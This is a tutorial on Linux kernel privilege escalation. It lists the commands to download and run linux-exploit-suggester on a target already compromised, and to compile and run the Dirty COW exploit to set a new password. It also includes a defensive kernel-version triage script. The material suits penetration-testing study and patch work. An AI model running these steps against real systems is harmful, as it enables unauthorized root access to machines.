Linux Kernel Exploit
Kernel exploits on Linux target vulnerabilities in the Linux kernel to execute arbitrary code, allowing an attacker to run privileged system commands or gain a system shell. The process varies depending on the kernel version, the distribution, and the specific exploit used.
Privilege Escalation Process on Linux
1. Identify Kernel Vulnerabilities – Check the target system’s kernel version and look for known vulnerabilities.
2. Download & Compile Exploits – Obtain the appropriate exploit code, compile it, and prepare it for execution.
3. Transfer & Execute the Exploit – Move the compiled exploit to the target system and run it to gain elevated privileges.
Linux Exploit Suggester
This tool helps identify security weaknesses in a Linux kernel or Linux-based machine. It uses heuristic methods to analyze the system and determine its exposure to publicly known Linux Kernel exploits.
# Prerequisite: you already have access to the target system
/bin/bash -i
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
upload les.sh
chmod +x les.sh
ls -alps
./les.sh
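Comparing the running kernel release against the first patched release of each series is one such heuristic, and the same check is useful for triaging hosts for patching. The sketch below is an added example, not code from linux-exploit-suggester; `kernel_status`, `FIXED_TABLE` and the table entries are constructed for illustration.

```shell
#!/bin/sh
# Added example; kernel_status and FIXED_TABLE are hypothetical names.
# FIXED_TABLE is constructed sample data: "<major.minor> <first patched patch level>".
# Take real values from your distribution's security advisories.
FIXED_TABLE='4.4 26
4.7 9
4.8 3'

# kernel_status RELEASE
# Prints one of: patched-upstream | candidate | unknown-series | invalid
kernel_status() {
    base=${1%%-*}                      # "4.4.0-21-generic" -> "4.4.0"
    case $base in
        [0-9]*.[0-9]*) ;;              # need at least "major.minor"
        *) echo invalid; return 2 ;;
    esac
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}; minor=${minor%%[!0-9]*}
    case $rest in
        *.*) patch=${rest#*.}; patch=${patch%%[!0-9]*} ;;
        *)   patch= ;;
    esac
    patch=${patch:-0}                  # "4.7" has no patch level: treat as 0
    case $major in *[!0-9]*) echo invalid; return 2 ;; esac

    # String match on the series so that 4.10 is never confused with 4.1
    fixed=
    while read -r series level; do
        if [ "$series" = "$major.$minor" ]; then fixed=$level; fi
    done <<EOF
$FIXED_TABLE
EOF
    if [ -z "$fixed" ]; then echo unknown-series; return 0; fi
    if [ "$patch" -ge "$fixed" ]; then echo patched-upstream; else echo candidate; fi
}

# Constructed sample release strings; on a real host pass "$(uname -r)"
for r in 4.4.0-21-generic 4.8.3 4.10.0-19-generic; do
    printf '%s -> %s\n' "$r" "$(kernel_status "$r")"
done
```

A `candidate` result is only a lead: distribution kernels backport fixes without changing the upstream version number, so confirm against the package changelog before treating a host as exposed.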
# Download the Dirty COW exploit from Exploit-DB
# Compile the dirty.c exploit using gcc
# -pthread -> Enable POSIX threads (multithreading support)
# dirty.c -> Source code file to compile
# -o dirty -> Output filename will be "dirty"
# -lcrypt -> Link the crypt library (used for password-related functions)
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty [NEW PASS]